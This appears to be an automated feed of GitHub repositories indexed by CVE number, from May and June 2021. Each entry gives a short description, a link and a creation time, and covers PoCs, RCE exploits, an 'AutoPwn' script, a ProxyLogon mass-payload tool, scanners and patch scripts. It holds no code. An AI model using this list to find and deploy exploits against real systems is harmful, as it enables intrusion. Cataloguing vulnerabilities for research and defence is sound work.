**PoC for exploiting CVE-2021-20345** : [JamesGeee/CVE-2021-20345](https://github.com/JamesGeee/CVE-2021-20345) create time: 2021-06-03T00:05:51Z

**PoC for exploiting CVE-2021-20343** : [JamesGeee/CVE-2021-20343](https://github.com/JamesGeee/CVE-2021-20343) create time: 2021-06-03T00:05:43Z

**PoC for exploiting CVE-2021-20338** : [JamesGeee/CVE-2021-20338](https://github.com/JamesGeee/CVE-2021-20338) create time: 2021-06-03T00:05:40Z

**A collection of scripts and instructions to test CVE-2014-0160 (heartbleed).** : [BelminD/heartbleed](https://github.com/BelminD/heartbleed) create time: 2021-03-30T13:11:26Z

**no description** : [bluefrostsecurity/CVE-2021-28476](https://github.com/bluefrostsecurity/CVE-2021-28476) create time: 2021-06-02T14:50:56Z

**LogonTracer v1.2.0 RCE** : [dnr6419/CVE-2018-16167](https://github.com/dnr6419/CVE-2018-16167) create time: 2021-06-02T07:39:19Z

**typo3 install.php XSS** : [dnr6419/CVE-2018-6905](https://github.com/dnr6419/CVE-2018-6905) create time: 2021-06-02T07:37:42Z

**PoC for exploiting CVE-2020-25710** : [JamesGeee/CVE-2020-25710](https://github.com/JamesGeee/CVE-2020-25710) create time: 2021-06-02T03:00:16Z

**no description** : [dorisroot1/CVE-2021-39991](https://github.com/dorisroot1/CVE-2021-39991) create time: 2021-06-02T03:20:18Z

**PoC for exploiting CVE-2021-32657** : [JamesGeee/CVE-2021-32657](https://github.com/JamesGeee/CVE-2021-32657) create time: 2021-06-02T03:00:12Z

**PoC for exploiting CVE-2021-32656** : [JamesGeee/CVE-2021-32656](https://github.com/JamesGeee/CVE-2021-32656) create time: 2021-06-02T03:00:10Z

**PoC for exploiting CVE-2021-30498** : [JamesGeee/CVE-2021-30498](https://github.com/JamesGeee/CVE-2021-30498) create time: 2021-06-02T03:00:07Z

**PoC for exploiting CVE-2021-29252** : [JamesGeee/CVE-2021-29252](https://github.com/JamesGeee/CVE-2021-29252) create time: 2021-06-02T03:00:03Z

**PoC of how to exploit a RCE vulnerability of the example DAGs in Apache Airflow <1.10.11** : [pberba/CVE-2020-11978](https://github.com/pberba/CVE-2020-11978) create time: 2021-05-22T15:58:01Z

**This script check the CVE-2021-21985 vulnerability and patch on vCenter Server.** : [mauricelambert/CVE-2021-21985](https://github.com/mauricelambert/CVE-2021-21985) create time: 2021-06-01T19:12:29Z

**test** : [dorisroot1/CVE-2021-2989](https://github.com/dorisroot1/CVE-2021-2989) create time: 2021-06-01T11:18:34Z

**CVE-2021-3999** : [dorisroot1/CVE-2021-3999](https://github.com/dorisroot1/CVE-2021-3999) create time: 2021-06-01T10:41:30Z

**Wordpress XXE injection 구축 자동화 및 PoC** : [dnr6419/CVE-2021-29447](https://github.com/dnr6419/CVE-2021-29447) create time: 2021-06-01T10:10:25Z

**PoC for exploiting CVE-2019-10218** : [JamesGeee/CVE-2019-10218](https://github.com/JamesGeee/CVE-2019-10218) create time: 2021-06-01T09:34:42Z

**PoC for exploiting CVE-2019-14870** : [JamesGeee/CVE-2019-14870](https://github.com/JamesGeee/CVE-2019-14870) create time: 2021-06-01T09:34:32Z

**PoC for exploiting CVE-2019-14907** : [JamesGeee/CVE-2019-14907](https://github.com/JamesGeee/CVE-2019-14907) create time: 2021-06-01T09:34:28Z

**PoC for exploiting CVE-2019-14861** : [JamesGeee/CVE-2019-14861](https://github.com/JamesGeee/CVE-2019-14861) create time: 2021-06-01T09:34:25Z

**PoC for exploiting CVE-2019-14847** : [JamesGeee/CVE-2019-14847](https://github.com/JamesGeee/CVE-2019-14847) create time: 2021-06-01T09:34:21Z

**PoC for exploiting CVE-2019-14902** : [JamesGeee/CVE-2019-14902](https://github.com/JamesGeee/CVE-2019-14902) create time: 2021-06-01T09:34:18Z

**PoC for exploiting CVE-2019-14833** : [JamesGeee/CVE-2019-14833](https://github.com/JamesGeee/CVE-2019-14833) create time: 2021-06-01T09:33:46Z

**PoC for exploiting CVE-2019-20790** : [JamesGeee/CVE-2019-20790](https://github.com/JamesGeee/CVE-2019-20790) create time: 2021-06-01T09:28:43Z

**PoC for exploiting CVE-2020-36375** : [JamesGeee/CVE-2020-36375](https://github.com/JamesGeee/CVE-2020-36375) create time: 2021-06-01T09:37:27Z

**PoC for exploiting CVE-2020-36374** : [JamesGeee/CVE-2020-36374](https://github.com/JamesGeee/CVE-2020-36374) create time: 2021-06-01T09:37:24Z

**PoC for exploiting CVE-2020-36373** : [JamesGeee/CVE-2020-36373](https://github.com/JamesGeee/CVE-2020-36373) create time: 2021-06-01T09:37:19Z

**PoC for exploiting CVE-2020-36371** : [JamesGeee/CVE-2020-36371](https://github.com/JamesGeee/CVE-2020-36371) create time: 2021-06-01T09:37:01Z

**PoC for exploiting CVE-2020-36370** : [JamesGeee/CVE-2020-36370](https://github.com/JamesGeee/CVE-2020-36370) create time: 2021-06-01T09:35:52Z

**PoC for exploiting CVE-2020-36369** : [JamesGeee/CVE-2020-36369](https://github.com/JamesGeee/CVE-2020-36369) create time: 2021-06-01T09:35:39Z

**PoC for exploiting CVE-2020-36368** : [JamesGeee/CVE-2020-36368](https://github.com/JamesGeee/CVE-2020-36368) create time: 2021-06-01T09:35:35Z

**PoC for exploiting CVE-2020-36367** : [JamesGeee/CVE-2020-36367](https://github.com/JamesGeee/CVE-2020-36367) create time: 2021-06-01T09:35:30Z

**PoC for exploiting CVE-2020-36366** : [JamesGeee/CVE-2020-36366](https://github.com/JamesGeee/CVE-2020-36366) create time: 2021-06-01T09:35:27Z

**PoC for exploiting CVE-2020-36372** : [JamesGeee/CVE-2020-36372](https://github.com/JamesGeee/CVE-2020-36372) create time: 2021-06-01T09:35:23Z

**PoC for exploiting CVE-2020-18392** : [JamesGeee/CVE-2020-18392](https://github.com/JamesGeee/CVE-2020-18392) create time: 2021-06-01T09:35:09Z

**PoC for exploiting CVE-2020-18395** : [JamesGeee/CVE-2020-18395](https://github.com/JamesGeee/CVE-2020-18395) create time: 2021-06-01T09:35:06Z

**PoC for exploiting CVE-2020-27619** : [JamesGeee/CVE-2020-27619](https://github.com/JamesGeee/CVE-2020-27619) create time: 2021-06-01T09:35:02Z

**PoC for exploiting CVE-2020-13956** : [JamesGeee/CVE-2020-13956](https://github.com/JamesGeee/CVE-2020-13956) create time: 2021-06-01T09:31:13Z

**PoC for exploiting CVE-2020-12460** : [JamesGeee/CVE-2020-12460](https://github.com/JamesGeee/CVE-2020-12460) create time: 2021-06-01T09:30:37Z

**PoC for exploiting CVE-2020-12272** : [JamesGeee/CVE-2020-12272](https://github.com/JamesGeee/CVE-2020-12272) create time: 2021-06-01T09:30:33Z

**PoC for exploiting CVE-2020-10666** : [JamesGeee/CVE-2020-10666](https://github.com/JamesGeee/CVE-2020-10666) create time: 2021-06-01T09:28:33Z

**no description** : [dorisroot1/CVE-2020-19919](https://github.com/dorisroot1/CVE-2020-19919) create time: 2021-06-01T09:22:10Z

**PoC for exploiting CVE-2021-32620** : [JamesGeee/CVE-2021-32620](https://github.com/JamesGeee/CVE-2021-32620) create time: 2021-06-01T09:37:54Z

**PoC for exploiting CVE-2021-29507** : [JamesGeee/CVE-2021-29507](https://github.com/JamesGeee/CVE-2021-29507) create time: 2021-06-01T09:37:50Z

**PoC for exploiting CVE-2021-29505** : [JamesGeee/CVE-2021-29505](https://github.com/JamesGeee/CVE-2021-29505) create time: 2021-06-01T09:37:34Z

**PoC for exploiting CVE-2021-29492** : [JamesGeee/CVE-2021-29492](https://github.com/JamesGeee/CVE-2021-29492) create time: 2021-06-01T09:37:31Z

**PoC for exploiting CVE-2021-23336** : [JamesGeee/CVE-2021-23336](https://github.com/JamesGeee/CVE-2021-23336) create time: 2021-06-01T09:34:59Z

**PoC for exploiting CVE-2021-21424** : [JamesGeee/CVE-2021-21424](https://github.com/JamesGeee/CVE-2021-21424) create time: 2021-06-01T09:34:55Z

**PoC for exploiting CVE-2021-30465** : [JamesGeee/CVE-2021-30465](https://github.com/JamesGeee/CVE-2021-30465) create time: 2021-06-01T09:34:52Z

**PoC for exploiting CVE-2021-20254** : [JamesGeee/CVE-2021-20254](https://github.com/JamesGeee/CVE-2021-20254) create time: 2021-06-01T09:33:15Z

**PoC for exploiting CVE-2021-33564** : [JamesGeee/CVE-2021-33564](https://github.com/JamesGeee/CVE-2021-33564) create time: 2021-06-01T09:33:12Z

**PoC for exploiting CVE-2021-31703** : [JamesGeee/CVE-2021-31703](https://github.com/JamesGeee/CVE-2021-31703) create time: 2021-06-01T09:33:08Z

**PoC for exploiting CVE-2021-31702** : [JamesGeee/CVE-2021-31702](https://github.com/JamesGeee/CVE-2021-31702) create time: 2021-06-01T09:33:04Z

**PoC for exploiting CVE-2021-30461** : [JamesGeee/CVE-2021-30461](https://github.com/JamesGeee/CVE-2021-30461) create time: 2021-06-01T09:33:00Z

**PoC for exploiting CVE-2021-33038** : [JamesGeee/CVE-2021-33038](https://github.com/JamesGeee/CVE-2021-33038) create time: 2021-06-01T09:32:33Z

**PoC for exploiting CVE-2021-1738** : [JamesGeee/CVE-2021-1738](https://github.com/JamesGeee/CVE-2021-1738) create time: 2021-06-01T09:31:40Z

**PoC for exploiting CVE-2021-1737** : [JamesGeee/CVE-2021-1737](https://github.com/JamesGeee/CVE-2021-1737) create time: 2021-06-01T09:31:36Z

**PoC for exploiting CVE-2021-29623** : [JamesGeee/CVE-2021-29623](https://github.com/JamesGeee/CVE-2021-29623) create time: 2021-06-01T09:31:31Z

**PoC for exploiting CVE-2021-32617** : [JamesGeee/CVE-2021-32617](https://github.com/JamesGeee/CVE-2021-32617) create time: 2021-06-01T09:31:28Z

**PoC for exploiting CVE-2021-33477** : [JamesGeee/CVE-2021-33477](https://github.com/JamesGeee/CVE-2021-33477) create time: 2021-06-01T09:31:24Z

**PoC for exploiting CVE-2021-1844** : [JamesGeee/CVE-2021-1844](https://github.com/JamesGeee/CVE-2021-1844) create time: 2021-06-01T09:30:48Z

**PoC for exploiting CVE-2021-1871** : [JamesGeee/CVE-2021-1871](https://github.com/JamesGeee/CVE-2021-1871) create time: 2021-06-01T09:30:44Z

**PoC for exploiting CVE-2021-1788** : [JamesGeee/CVE-2021-1788](https://github.com/JamesGeee/CVE-2021-1788) create time: 2021-06-01T09:30:41Z

**PoC for exploiting CVE-2021-33790** : [JamesGeee/CVE-2021-33790](https://github.com/JamesGeee/CVE-2021-33790) create time: 2021-06-01T09:28:40Z

**PoC for exploiting CVE-2021-23343** : [JamesGeee/CVE-2021-23343](https://github.com/JamesGeee/CVE-2021-23343) create time: 2021-06-01T09:28:37Z

**PoC for exploiting CVE-2021-3493** : [JamesGeee/CVE-2021-3493](https://github.com/JamesGeee/CVE-2021-3493) create time: 2021-06-01T09:28:29Z

**CVE-2021-21985 Checker (credits to alt3kx).** : [onSec-fr/CVE-2021-21985-Checker](https://github.com/onSec-fr/CVE-2021-21985-Checker) create time: 2021-06-01T08:31:05Z

**cve-2021-19999test** : [dorisroot1/cve-2021-19999test-3](https://github.com/dorisroot1/cve-2021-19999test-3) create time: 2021-06-01T03:44:30Z

**PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.** : [0vercl0k/CVE-2021-28476](https://github.com/0vercl0k/CVE-2021-28476) create time: 2021-05-31T18:02:39Z

**no description** : [rnnsz/CVE-2008-4654](https://github.com/rnnsz/CVE-2008-4654) create time: 2021-05-31T18:27:55Z

**no description** : [rnnsz/CVE-2017-8367](https://github.com/rnnsz/CVE-2017-8367) create time: 2021-05-31T18:27:32Z

**no description** : [rnnsz/CVE-2017-15950](https://github.com/rnnsz/CVE-2017-15950) create time: 2021-05-31T18:26:19Z

**python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others** : [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC) create time: 2021-05-31T14:54:38Z

**AutoPwn Script for Moodle 3.9 leveraging CVE-2020–20282, CVE-2020–14320,CVE-2020–14321** : [3mrgnc3/Moodle_3.9_RCE_AutoPwn](https://github.com/3mrgnc3/Moodle_3.9_RCE_AutoPwn) create time: 2021-05-31T15:03:49Z

**BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.** : [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389) create time: 2021-05-31T14:12:26Z

**no description** : [alt3kx/CVE-2021-21985](https://github.com/alt3kx/CVE-2021-21985) create time: 2021-05-29T13:07:14Z

**JBoss CVE-2017-12149 (Insecure Deserialization - RCE) Exploitation Lab.** : [Xcatolin/jboss-deserialization](https://github.com/Xcatolin/jboss-deserialization) create time: 2021-05-30T20:26:51Z

**no description** : [Pho03niX/CVE-2021-27338](https://github.com/Pho03niX/CVE-2021-27338) create time: 2021-05-30T17:02:56Z

**CVE-2021-21551 proof of concept (PoC) exploit** : [mathisvickie/CVE-2021-21551](https://github.com/mathisvickie/CVE-2021-21551) create time: 2021-05-30T10:15:10Z

**CVE-2021-20717-EC-CUBE-XSS** : [s-index/CVE-2021-20717](https://github.com/s-index/CVE-2021-20717) create time: 2021-05-29T08:08:21Z

**Cacti v1.2.8 Unauthenticated Remote Code Execution** : [hexcowboy/CVE-2020-8813](https://github.com/hexcowboy/CVE-2020-8813) create time: 2021-05-28T17:55:49Z

**PoC for exploiting CVE-2020-27208** : [JamesGeee/CVE-2020-27208](https://github.com/JamesGeee/CVE-2020-27208) create time: 2021-05-28T16:54:21Z

**PoC for exploiting CVE-2020-12061** : [JamesGeee/CVE-2020-12061](https://github.com/JamesGeee/CVE-2020-12061) create time: 2021-05-28T16:54:16Z

**Proof of Concept for CVE-2020-14295.** : [mrg3ntl3m4n/poc-CVE-2020-14295](https://github.com/mrg3ntl3m4n/poc-CVE-2020-14295) create time: 2021-05-28T16:40:49Z

**PoC for exploiting CVE-2021-29629** : [JamesGeee/CVE-2021-29629](https://github.com/JamesGeee/CVE-2021-29629) create time: 2021-05-28T16:54:26Z

**PoC for exploiting CVE-2021-29628** : [JamesGeee/CVE-2021-29628](https://github.com/JamesGeee/CVE-2021-29628) create time: 2021-05-28T16:54:25Z

**PoC for exploiting CVE-2021-33516** : [JamesGeee/CVE-2021-33516](https://github.com/JamesGeee/CVE-2021-33516) create time: 2021-05-28T16:54:20Z

**My notes for CVE-2004-1561 IceCast exploitation** : [Nathan-Bash/CVE-2004-1561-Notes](https://github.com/Nathan-Bash/CVE-2004-1561-Notes) create time: 2021-05-28T09:01:44Z

**Script to patch your domain computers about the CVE-2021-21551. Privesc on machines that have the driver dbutil_2_3.sys, installed by some DELL tools (BIOS updater, SupportAssist...)** : [arnaudluti/PS-CVE-2021-21551](https://github.com/arnaudluti/PS-CVE-2021-21551) create time: 2021-05-28T07:29:40Z

**Exploit for Joomla JCK Editor 6.4.4 (CVE-2018-17254)** : [Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection](https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection) create time: 2021-03-05T21:06:45Z

**no description** : [ykg88/OHTS_IE6052-CVE-2020-17087](https://github.com/ykg88/OHTS_IE6052-CVE-2020-17087) create time: 2021-05-27T16:55:39Z

**CVE-2017-8917 - Joomla 3.7.0 'com_fields' SQL Injection** : [SiopySh/CVE-2017-8917](https://github.com/SiopySh/CVE-2017-8917) create time: 2021-05-27T13:54:12Z

**Multiple vulnerabilities in the vSphere Client (HTML5) were privately reported to VMware. Updates and workarounds are available to address these vulnerabilities in affected VMware products.** : [bigbroke/CVE-2021-21985](https://github.com/bigbroke/CVE-2021-21985) create time: 2021-05-27T02:28:48Z

**Argument Injection in Dragonfly Ruby Gem** : [mlr0p/CVE-2021-33564](https://github.com/mlr0p/CVE-2021-33564) create time: 2021-05-25T02:48:08Z

**PoC for exploiting CVE-2016-20011** : [JamesGeee/CVE-2016-20011](https://github.com/JamesGeee/CVE-2016-20011) create time: 2021-05-26T03:00:50Z

**PoC for exploiting CVE-2017-7180** : [JamesGeee/CVE-2017-7180](https://github.com/JamesGeee/CVE-2017-7180) create time: 2021-05-26T03:01:06Z

**PoC for exploiting CVE-2020-27216** : [JamesGeee/CVE-2020-27216](https://github.com/JamesGeee/CVE-2020-27216) create time: 2021-05-26T03:01:03Z

**PoC for exploiting CVE-2021-28112** : [JamesGeee/CVE-2021-28112](https://github.com/JamesGeee/CVE-2021-28112) create time: 2021-05-26T03:00:23Z

**PoC for exploiting CVE-2021-28111** : [JamesGeee/CVE-2021-28111](https://github.com/JamesGeee/CVE-2021-28111) create time: 2021-05-26T03:00:19Z

**PoC for exploiting CVE-2021-33574** : [JamesGeee/CVE-2021-33574](https://github.com/JamesGeee/CVE-2021-33574) create time: 2021-05-26T03:00:16Z

**PoC for exploiting CVE-2021-33570** : [JamesGeee/CVE-2021-33570](https://github.com/JamesGeee/CVE-2021-33570) create time: 2021-05-26T03:00:13Z

**PoC for exploiting CVE-2021-22667** : [JamesGeee/CVE-2021-22667](https://github.com/JamesGeee/CVE-2021-22667) create time: 2021-05-26T03:00:10Z

**PoC for exploiting CVE-2021-33575** : [JamesGeee/CVE-2021-33575](https://github.com/JamesGeee/CVE-2021-33575) create time: 2021-05-26T03:00:06Z

**Exploit coming soon** : [Hacker5preme/CVE-2020-29607-exploit](https://github.com/Hacker5preme/CVE-2020-29607-exploit) create time: 2021-05-25T21:48:04Z

**LPIOT2020-2021 Cours (M3) sur Neo4J** : [AdrianPaulCarrieres/lpiot2020-neo4j-cve-adrianpaulcarrieres](https://github.com/AdrianPaulCarrieres/lpiot2020-neo4j-cve-adrianpaulcarrieres) create time: 2021-05-25T21:29:46Z

**Coming soon** : [Hacker5preme/CVE-2018-19423-Exploit](https://github.com/Hacker5preme/CVE-2018-19423-Exploit) create time: 2021-05-25T16:55:17Z

**POC for CVE2021-2091 VMWare ESXi RCE Exploit** : [Shadow0ps/CVE-2021-20914](https://github.com/Shadow0ps/CVE-2021-20914) create time: 2021-05-25T17:14:38Z

**My research and works about the CVE 2016-5063/1542/1543 about the RSCD agent** : [DreadFog/RSCD_CVEs](https://github.com/DreadFog/RSCD_CVEs) create time: 2021-05-25T15:56:33Z

**no description** : [Marsable/CVE-2020-27955-LFS](https://github.com/Marsable/CVE-2020-27955-LFS) create time: 2021-05-25T15:26:35Z

**reproduce a kernel bug** : [Alex-Lian/CVE-2020-8428-demo](https://github.com/Alex-Lian/CVE-2020-8428-demo) create time: 2021-05-25T14:55:42Z

**no description** : [mdanzaruddin/CVE-2021-33558.](https://github.com/mdanzaruddin/CVE-2021-33558.) create time: 2021-05-25T09:33:21Z

**no description** : [DarkFlameMaster-bit/CVE-2018-8174_EXP](https://github.com/DarkFlameMaster-bit/CVE-2018-8174_EXP) create time: 2021-05-25T07:48:30Z

**22893 poc** : [r90tpass/cve-2021-22893](https://github.com/r90tpass/cve-2021-22893) create time: 2021-05-25T08:04:43Z

**RCE** : [r90tpass/CVE-2021-8989898](https://github.com/r90tpass/CVE-2021-8989898) create time: 2021-05-25T07:53:47Z

**RCE** : [r90tpass/CVE-2021-3222222](https://github.com/r90tpass/CVE-2021-3222222) create time: 2021-05-25T06:46:52Z

**PoC for exploiting CVE-2020-36227** : [JamesGeee/CVE-2020-36227](https://github.com/JamesGeee/CVE-2020-36227) create time: 2021-05-25T00:49:28Z

**PoC for exploiting CVE-2020-36223** : [JamesGeee/CVE-2020-36223](https://github.com/JamesGeee/CVE-2020-36223) create time: 2021-05-25T00:49:25Z

**PoC for exploiting CVE-2020-36226** : [JamesGeee/CVE-2020-36226](https://github.com/JamesGeee/CVE-2020-36226) create time: 2021-05-25T00:49:22Z

**PoC for exploiting CVE-2021-23841** : [JamesGeee/CVE-2021-23841](https://github.com/JamesGeee/CVE-2021-23841) create time: 2021-05-25T00:49:19Z

**PoC for exploiting CVE-2021-3012** : [JamesGeee/CVE-2021-3012](https://github.com/JamesGeee/CVE-2021-3012) create time: 2021-05-25T00:49:16Z

**PoC for exploiting CVE-2020-24993** : [JamesGeee/CVE-2020-24993](https://github.com/JamesGeee/CVE-2020-24993) create time: 2021-05-24T20:38:23Z

**PoC for exploiting CVE-2020-18178** : [JamesGeee/CVE-2020-18178](https://github.com/JamesGeee/CVE-2020-18178) create time: 2021-05-24T20:38:16Z

**PoC for exploiting CVE-2020-24755** : [JamesGeee/CVE-2020-24755](https://github.com/JamesGeee/CVE-2020-24755) create time: 2021-05-24T20:38:12Z

**PoC for exploiting CVE-2020-18220** : [JamesGeee/CVE-2020-18220](https://github.com/JamesGeee/CVE-2020-18220) create time: 2021-05-24T20:38:09Z

**Western Digital MyCloud PR4100 Link Resolution Information Disclosure Vulnerability** : [piffd0s/CVE-2021-3310](https://github.com/piffd0s/CVE-2021-3310) create time: 2021-05-24T20:55:33Z

**PoC for exploiting CVE-2021-29687** : [JamesGeee/CVE-2021-29687](https://github.com/JamesGeee/CVE-2021-29687) create time: 2021-05-24T20:38:19Z

**no description** : [nopdata/cve-2020-28948](https://github.com/nopdata/cve-2020-28948) create time: 2021-05-24T15:36:16Z

**http.sys remote UAF to Leak Credential** : [Udyz/CVE-2021-31166](https://github.com/Udyz/CVE-2021-31166) create time: 2021-05-24T07:42:18Z

**Qualcomm GPU / ARM Mali GPU** : [TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664](https://github.com/TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664) create time: 2021-05-23T23:02:41Z

**PoC exploit for Telerik-CVE-2017-9248** : [ZhenwarX/Telerik-CVE-2017-9248-PoC](https://github.com/ZhenwarX/Telerik-CVE-2017-9248-PoC) create time: 2021-05-23T19:54:18Z

**no description** : [bgsilvait/WIn-CVE-2021-31166](https://github.com/bgsilvait/WIn-CVE-2021-31166) create time: 2021-05-23T18:41:48Z

**no description** : [idanshechter/CVE-2017-13208-Scanner](https://github.com/idanshechter/CVE-2017-13208-Scanner) create time: 2021-05-23T17:39:09Z

**Python for mass deploying payload on Microsoft Exchange Servers affected by ProxyLogon (CVE-2021-26857, CVE-2021-26855, CVE-2021-27065)** : [cryptolakk/ProxyLogon-Mass-RCE](https://github.com/cryptolakk/ProxyLogon-Mass-RCE) create time: 2021-05-23T17:09:30Z

**WordPress XXE vulnerability** : [Vulnmachines/wordpress_cve-2021-29447](https://github.com/Vulnmachines/wordpress_cve-2021-29447) create time: 2021-05-23T14:08:34Z

**Codiad unauthenticated Remote Code Execution** : [Hacker5preme/CVE-2019-19208-exploit](https://github.com/Hacker5preme/CVE-2019-19208-exploit) create time: 2021-05-13T13:57:07Z

**no description** : [nob0dy-3389/CVE-2020-27955](https://github.com/nob0dy-3389/CVE-2020-27955) create time: 2021-05-23T01:40:11Z

**Write-up and proof of concept exploit for CVE-2020-14372** : [kukrimate/CVE-2020-14372](https://github.com/kukrimate/CVE-2020-14372) create time: 2021-04-19T23:36:25Z

**this is a test** : [asdfkj1/CVE-2021-31168](https://github.com/asdfkj1/CVE-2021-31168) create time: 2021-05-22T03:59:57Z

**PoC for exploiting CVE-2020-25242** : [JamesGeee/CVE-2020-25242](https://github.com/JamesGeee/CVE-2020-25242) create time: 2021-05-21T15:45:42Z

**PoC for exploiting CVE-2020-17891** : [JamesGeee/CVE-2020-17891](https://github.com/JamesGeee/CVE-2020-17891) create time: 2021-05-21T15:45:39Z

**PoC for exploiting CVE-2021-25660** : [JamesGeee/CVE-2021-25660](https://github.com/JamesGeee/CVE-2021-25660) create time: 2021-05-21T15:45:45Z

**PoC for exploiting CVE-2021-27386** : [JamesGeee/CVE-2021-27386](https://github.com/JamesGeee/CVE-2021-27386) create time: 2021-05-21T15:45:35Z

**PoC for exploiting CVE-2021-23009** : [JamesGeee/CVE-2021-23009](https://github.com/JamesGeee/CVE-2021-23009) create time: 2021-05-21T15:45:32Z

**no description** : [nondejus/CVE-2021-31876](https://github.com/nondejus/CVE-2021-31876) create time: 2021-05-21T13:19:50Z

**no description** : [KevinWorst/CVE-2021-28482_Exploits](https://github.com/KevinWorst/CVE-2021-28482_Exploits) create time: 2021-05-21T07:34:46Z

**Exploit Delivery via Steganography and Polyglots, CVE-2014-0282** : [Charmve/PyStegosploit](https://github.com/Charmve/PyStegosploit) create time: 2021-05-17T04:39:32Z

**no description** : [ch3rn0byl/CVE-2021-21551](https://github.com/ch3rn0byl/CVE-2021-21551) create time: 2021-05-21T03:13:58Z

**POC for exiftool vuln (CVE-2021-22204).** : [bilkoh/POC-CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204) create time: 2021-05-21T00:14:52Z

**Local Privilege Escalation is a way to take advantage of flaws in code or service administration that can manage regular or guest users for particular device activities or transfer root user privileges to master or client. User rights admin. The licenses or privileges may be violated by such undesired amendments, as the system may be disrupted by frequent users unless they have shell or root authorization. So, someone, someone, it may become dangerous and be used to obtain access to a higher level.** : [jana30116/CVE-2019-13272-Local-Privilege-Escalation](https://github.com/jana30116/CVE-2019-13272-Local-Privilege-Escalation) create time: 2021-05-20T19:13:28Z

**RCE** : [smallpiggy/CVE-2019-7238](https://github.com/smallpiggy/CVE-2019-7238) create time: 2021-05-20T14:03:10Z

**CVE-2019-14287** : [DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights](https://github.com/DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights) create time: 2021-05-20T13:57:38Z

**Docker image that lets me study the exploitation of the VIM exploit** : [nickylimjj/cve-2019-12735](https://github.com/nickylimjj/cve-2019-12735) create time: 2021-05-20T07:18:49Z

**no description** : [Jauler/cve2021-3156-sudo-heap-overflow](https://github.com/Jauler/cve2021-3156-sudo-heap-overflow) create time: 2021-05-19T09:44:17Z

**simple bash script for exploit CVE-2021-31166** : [zecopro/CVE-2021-31166](https://github.com/zecopro/CVE-2021-31166) create time: 2021-05-19T07:50:40Z

**no description** : [pipiping/CVE-2021-CVEceshi](https://github.com/pipiping/CVE-2021-CVEceshi) create time: 2021-05-19T06:31:31Z

**HTTP Protocol Stack CVE-2021-31166** : [corelight/CVE-2021-31166](https://github.com/corelight/CVE-2021-31166) create time: 2021-05-17T23:54:12Z

**PoC for exploiting CVE-2020-20220** : [JamesGeee/CVE-2020-20220](https://github.com/JamesGeee/CVE-2020-20220) create time: 2021-05-19T03:00:16Z

**PoC for exploiting CVE-2020-20227** : [JamesGeee/CVE-2020-20227](https://github.com/JamesGeee/CVE-2020-20227) create time: 2021-05-19T03:00:06Z

**PoC for exploiting CVE-2021-31321** : [JamesGeee/CVE-2021-31321](https://github.com/JamesGeee/CVE-2021-31321) create time: 2021-05-19T03:01:41Z

**PoC for exploiting CVE-2021-31320** : [JamesGeee/CVE-2021-31320](https://github.com/JamesGeee/CVE-2021-31320) create time: 2021-05-19T03:01:38Z

**PoC for exploiting CVE-2021-31319** : [JamesGeee/CVE-2021-31319](https://github.com/JamesGeee/CVE-2021-31319) create time: 2021-05-19T03:01:06Z

**PoC for exploiting CVE-2021-31318** : [JamesGeee/CVE-2021-31318](https://github.com/JamesGeee/CVE-2021-31318) create time: 2021-05-19T03:01:02Z

**PoC for exploiting CVE-2021-31317** : [JamesGeee/CVE-2021-31317](https://github.com/JamesGeee/CVE-2021-31317) create time: 2021-05-19T03:00:23Z

**PoC for exploiting CVE-2021-31316** : [JamesGeee/CVE-2021-31316](https://github.com/JamesGeee/CVE-2021-31316) create time: 2021-05-19T03:00:19Z

**PoC for exploiting CVE-2021-31207** : [JamesGeee/CVE-2021-31207](https://github.com/JamesGeee/CVE-2021-31207) create time: 2021-05-19T03:00:13Z

**PoC for exploiting CVE-2021-31213** : [JamesGeee/CVE-2021-31213](https://github.com/JamesGeee/CVE-2021-31213) create time: 2021-05-19T03:00:09Z

**no description** : [pipiping/CVE-2021-yhpphy](https://github.com/pipiping/CVE-2021-yhpphy) create time: 2021-05-19T02:53:11Z

**CVE-2021-31703** : [l00neyhacker/CVE-2021-31703](https://github.com/l00neyhacker/CVE-2021-31703) create time: 2021-05-18T21:46:31Z

**CVE-2021-31702** : [l00neyhacker/CVE-2021-31702](https://github.com/l00neyhacker/CVE-2021-31702) create time: 2021-05-18T21:41:13Z

**PoC for exploiting CVE-2019-8689** : [JamesGeee/CVE-2019-8689](https://github.com/JamesGeee/CVE-2019-8689) create time: 2021-05-18T16:09:22Z

**PoC for exploiting CVE-2019-8814** : [JamesGeee/CVE-2019-8814](https://github.com/JamesGeee/CVE-2019-8814) create time: 2021-05-18T16:09:18Z

**PoC for exploiting CVE-2019-8815** : [JamesGeee/CVE-2019-8815](https://github.com/JamesGeee/CVE-2019-8815) create time: 2021-05-18T16:09:13Z

**PoC for exploiting CVE-2019-8816** : [JamesGeee/CVE-2019-8816](https://github.com/JamesGeee/CVE-2019-8816) create time: 2021-05-18T16:08:34Z

**PoC for exploiting CVE-2019-8835** : [JamesGeee/CVE-2019-8835](https://github.com/JamesGeee/CVE-2019-8835) create time: 2021-05-18T16:08:30Z

**PoC for exploiting CVE-2019-8844** : [JamesGeee/CVE-2019-8844](https://github.com/JamesGeee/CVE-2019-8844) create time: 2021-05-18T16:08:27Z

**PoC for exploiting CVE-2019-8846** : [JamesGeee/CVE-2019-8846](https://github.com/JamesGeee/CVE-2019-8846) create time: 2021-05-18T16:08:23Z

**PoC for exploiting CVE-2020-23852** : [JamesGeee/CVE-2020-23852](https://github.com/JamesGeee/CVE-2020-23852) create time: 2021-05-18T16:18:29Z

